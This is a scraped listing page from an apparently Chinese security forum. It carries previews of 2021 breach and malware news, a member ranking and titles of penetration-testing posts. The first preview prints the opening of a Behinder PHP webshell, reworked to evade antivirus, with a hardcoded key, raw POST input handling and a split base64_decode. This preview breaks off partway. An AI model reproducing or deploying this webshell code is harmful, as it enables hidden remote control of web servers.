冰蝎php静态免杀

自评TCV 11、源码特征修改<?php@error_reporting(0);session_start(); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond $_SESSION=$key; $post=file_get_contents("php://input"); if(!extension_loaded(\'openssl\')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post) ...

数十名欧盟官员被卷入 Facebook 数据泄露事件

欧盟司法专员Didier Reynders、卢森堡首相Xavier Bettel和数十名欧盟官员都被卷入了Facebook的数据泄露事件,该事件被发布到公共论坛上并广泛流传。他们的数据是周六被发现的5.33亿条记录的一部分,包括电话号码、Facebook ID、全名和出生日期,并在网上论坛上免费流传。POLITICO看到的比利时和卢森堡受害者的数据集还包含 ...

2021-04-09 11:46:04 0 168

Android 恶意软件冒充 Netflix 劫持 WhatsApp 会话

安全研究人员在Google Play上的一款应用中发现了一个新的Android恶意软件变种,该软件通过承诺免费订阅Netflix来吸引受害者。周三,Check Point Research(CPR)表示,这种 蠕虫类移动恶意软件是在Android应用的官方存储库Google Play商店中被发现的。  这款被称为 “FlixOnline “的恶意软件将自己伪装成一个合法的Netflix ...

2021-04-08 15:06:14 0 175

难敌黑客,公司创始人信息被曝光,美巨头陷入“信息泄露”风波

据美国媒体报道,美国互联网巨头——脸书遭到黑客袭击,超过5.33亿的脸书用户私密信息被发布到黑客论坛网站上,就连公司的创始人马克·扎克伯格的个人信息也被发布到网络上,这一消息令美国舆论集体炸锅,人们纷纷谴责脸书公司没能做到保护用户隐私。据报道,超过5.33亿脸书用户的详细信息和电话号码被黑客泄露,这其中还包 ...

2021-04-08 12:31:34 0 311

斯坦福、UC系统遭黑客攻击?邮件勒索数千万,不然就公开个人信息

经UC系统校方证实:近期学生及申请者收到了黑客勒索邮件…根据校方的表示,此次网络安全攻击针对的是Accellion(一个用于安全传输文件的第三方供应商)中的漏洞。UC系统的工作人员称:这次背后攻击的黑客已经在网上发布了部分学生个人信息的屏幕截图,如果造成某些数据会被泄露,我们将及时通知加州大学社区成员。”黑客最 ...

2021-04-08 12:26:22 0 179

研究发现 Android手机收集的用户数据是iPhone的20倍

都柏林圣三一学院的一位计算机科学教授进行的一项研究发现,一部典型的 Android 手机收集的用户数据大约是同等 iPhone 的 20 倍。据 ArsTechnica 报道,学院的计算机系统主席研究员道格·莱斯表示,iOS 和 Android 都在不断收集所谓的遥测数据,并分别将其发送回苹果和谷歌。这些信息的范围从将 SIM 卡插入智能手机到与硬件 ...

2021-04-07 09:29:52 1 265

白帽子违规披露漏洞背后可能的原因

在无数个向厂商提交漏洞的日子里,以下的场景你是否似曾相识?被厂商“白嫖”:“这根本不是一个漏洞!”但当你再次复查时,发现漏洞已经被修复。被厂商的威胁:“这就不是一个洞,但你敢公开的话就试试看!”被厂商误会:“你知道这样是违规披露漏洞吗?我会报警的!”然后你真的就被邀“喝茶”了。被厂商“占便宜”:“不 ...

2021-04-06 21:30:02 11 1421

热门活动

T00ls专家

zcgonvh

荣誉会员

文章26篇,精华12篇

1

Twi1ight

荣誉会员

文章35篇,精华11篇

2

Rices

荣誉会员

文章152篇,精华5篇

3

Bypass

荣誉会员

文章26篇,精华5篇

4

lyxhh

版主

文章13篇,精华4篇

5

backlion

注册会员

文章29篇,精华3篇

6

陆羽

元老核心

文章95篇,精华2篇

7

LandGrey

注册会员

文章25篇,精华2篇

8

panda

荣誉会员

文章40篇,精华2篇

9

anhkgg

注册会员

文章33篇,精华2篇

10

最新精华

渗透测试探索低版本.Net反序列化实现Exchange RCE

# 探索低版本.Net反序列化实现Exchange RCE## 0x10 起因近期在 ...

2020-10-20 10:23:31 3 686

渗透测试Spring Boot 相关漏洞利用 Check List

> Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全 ...

2020-06-06 16:16:41 60 7043

渗透测试Windows内网协议-Kerberos

## Kerberos协议### 简介Kerberos是一种由MIT(麻省理工大学)提 ...

2020-04-15 21:59:32 16 1159

渗透测试这是一篇“不一样”的真实渗透测试案例分析文章

# 0x00 前言本文是由一次真实的授权渗透案例引申而出的技术分析 ...

2020-03-20 18:16:34 77 15778

渗透测试Windows认证原理解析基础入门学习

#### 0x01 前言简介本文借鉴安全界各位大佬所写的Windows认证入 ...

2020-03-17 13:07:21 16 658

WordPress的前端上传v0.5.4.4任意PHP文件上传

插件不正确过滤的文件类型,允许上传以下格式的文件类型: t00ls.php.jpg 易受攻击的主机,将作为一个php文件,这些文件,允许上传并执行恶意文件。 在创建这个插件上传文件夹,代码利用uniqid添加一个唯一的字符串上传文件夹的名称,以便更好地隐藏它直接访问。 例如: / wp-content/uploads/feu_9fc12558ac71e6995808cfc590207e87 / 然而,很多../ wp-content/uploads允许直接 ...

Top ↑